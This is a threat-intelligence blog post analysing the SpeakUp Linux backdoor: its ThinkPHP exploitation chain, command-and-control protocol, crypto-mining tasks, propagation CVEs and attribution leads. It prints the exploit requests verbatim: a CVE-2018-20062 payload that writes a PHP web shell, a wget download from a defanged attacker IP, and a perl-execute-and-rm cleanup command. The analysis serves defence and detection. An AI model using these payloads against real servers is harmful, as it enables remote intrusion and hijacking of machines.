SpeakUp Linux Backdoor

Ransomware LewisR todayApril 24, 2019 415 198 4

Background
share close

The new Trojan, named “SpeakUp” after one of its command and control names, exploits known vulnerabilities in six different Linux distributions. The attack is gaining momentum and targeting servers in East Asia and Latin America, including AWS hosted machines.

SpeakUp acts to propagate internally within the infected subnet, and beyond to new IP ranges, exploiting remote code execution vulnerabilities. In addition, SpeakUp presented ability to infect Mac devices with the undetected backdoor.

While the exact identity of the threat actor behind this new attack is still unconfirmed, cyberwatch365 Researchers were able to correlate SpeakUp’s author with malware developer under the name of Zettabit. Although SpeakUp is implemented differently, it has a lot in common with Zettabit’s craftmanship.

Infection Vector

The initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.

The exploitation is issued in three steps:

  1. Exploiting CVE-2018-20062 for uploading a PHP shell

Using a GET request, a remote command execution vulnerability in ThinkPHP (CVE-2018-20062) is sent to the targeted server, as shown below:

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<? php $action = $_GET[‘module’];system($action);? ^>>index.php

 

This shell executes commands sent via the “module” parameter in a query.

  1. Serving the backdoor

Another HTTP request is sent to the targeted server, with the following resource:

/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc

The above standard injection pulls the ibus payload and stores it on /tmp/e3ac24a0bcddfacd010a6c10f4a814bc

  1. Launching the backdoor

The execution is issued using an additional HTTP request:

/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc

That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence.

 

Backdoor

The sample we analyzed was observed targeting a machine in China on January 14, 2019 and was first submitted to VirusTotal on January 9 2019. At the time of writing this article, it has no detections in VT.

Figure 3: no detections for SpeakUp in Virus Total

 

In an attempt to endure the investigation process by security researchers, the second stage payload was encoded with salted base64. To our dismay, the C&C communication was also encoded with the same combination.

The revealed data contains multiple C&C domains, IP addresses and other unique parameters, along with second-stage payloads and additional modules.
In the below analysis we will go through the malicious code, reveal the different functions and modules the Trojan runs on the victim’s machine.

 

Victim Registration

SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C which is the compromised website of speakupomaha[.]com.
The first POST packet sends a victim ID and more introductory information such as the current version of the installed script. (Currently 1.0.4)
The immediate first C&C response is “needrgr” which means the infected victim is new to the server and needs a registration.
Afterwards, the Trojan posts “full information” about the machine by executing the following LINUX commands:

  • Uname (-r, -v, -m, -n,-a, -s)
  • Whoami
  • Ifconfig –a
  • Arp –a
  • cat /proc/cpuinfo | grep -c “cpu family” 2>&1
  • who –b

Figure 1: The registration process and introductory commands

 

SpeakUp’s Main Functions

After the registration process is completed, SpeakUp continuously communicates with its C&C for new tasks on a fixed “knock” interval.

The following command types are available by the C&C:

“newtask”- Execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program and sends updated fingerprint data.

“notask”- Sleep for 3 seconds and ask for additional command.

newerconfig”- Update the downloaded miner configuration file.

SpeakUp’s persistence is ensured by using cron and an internal mutex to ensure only one instance remains alive at all times.

 

Post-Infection Traffic

Once the victim is registered successfully, the C&C begins sending new tasks. Most of them manipulate the machine to download and execute different files.

An interesting point to mention is the User-Agents in use. SpeakUp defines three User-Agents that the infected machine must use in every communication with its C&C. Two of them are MacOS X User-Agents and the third is a hashed string:

  • Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
  • Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
  • E9BC3BD76216AFA560BFB5ACAF5731A3

Figure 2: SpeakUp `s requests are encrypted with the salted base64 and include the unique User-Agent

 

At the moment SpeakUp serves XMRig miners to its listening infected servers.  According to XMRHunter the wallets hold a total of ~107 Monero coins.

Figure 3: SpeakUp receives additional commands to execute, this time in plain text.

 

Propagation

SpeakUp also equips its backdoors with i (sic), a python script which allows the backdoor to scan and infect more Linux servers within its internal and external subnets. Its main functions are:

  1. Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels.
  2. Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\16).
  3. Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers:

a) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
b) CVE-2010-1871: JBoss Seam Framework remote code execution
c) JBoss AS 3/4/5/6: Remote Command Execution (exploit)
d) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE
e) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
f) Hadoop YARN ResourceManager – Command Execution (exploit)
g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

A successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server.

 

Attacker Identity and Leads

Ibus client for Unix OS

Inside the ibus script, we can see a short description about an IBus client for GNU Emacs. The IBus client is an open-source multilingual input framework for Linux and Unix OS. While it supports all languages that do not use Latin letters, it seems that the main audience is Asian users. The description and the file name are the only elements that link SpeakUp to the Ibus framework; the content has no similarities whatsoever.

This may imply a connection between SpeakUp to East Asia.


Unique User-Agents

The unique User-Agents used in the HTTP communication between SpeakUp to the C&C are a possible path to the identity of the threat actor behind this campaign.
The unique strings mainly consist of “Mobile/BADDAD“, “Mobile/7B405” and “E9BC3BD76216AFA560BFB5ACAF5731A3.

Interestingly enough, the string turned out to be the md5 hash of the word liteHTTP.

Googling liteHTTP leads to the liteHTTP github project.

While liteHTTP is a C# based bot which targets Windows clients, its modules are somewhat similar to our SpeakUp Trojan.

  • Download & execute
  • Startup (with persistence)
  • Collection of system information (OS, version, installed location, etc.)
  • Self-update
  • Uninstall

 

The Hack Forums profile may imply the author of SpeakUp backdoor is Russian speaking, as many of the comments are written in this language. He also seems to be a botnet developer, providing recommendations and publishing his LiteHTTP bot, which seems to have a well-designed GUI interface.

Another interesting thing to note is the use of the acronym “Knock” on several occasions in his posts. “Knock” also appears in several strings inside the code of SpeakUp.

Figures 4: LiteHTTP screenshots taken from the user`s profile in which the acronym “Knock” appears

 

Conclusion

SpeakUp`s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware. This campaign, while still relatively new, can evolve into something bigger and potentially more harmful.

Indeed, the threat actor behind this campaign, ‘Zettabithf’ himself, provides some ‘words of wisdom’ in this respect:

 

 

Cyberwatch365 SaaS is an advanced threat prevention technology that protects against on your cloud infrastructure, including new Trojans like ‘SpeakUp’.

 

 

Written by: LewisR

Tagged as: , , , , , .

Rate it
Previous post

Similar posts

Post comments (0)

Leave a reply

Your email address will not be published. Required fields are marked *


  • hello@cyberwatch365.com
  • +44 (0) 203 744 7422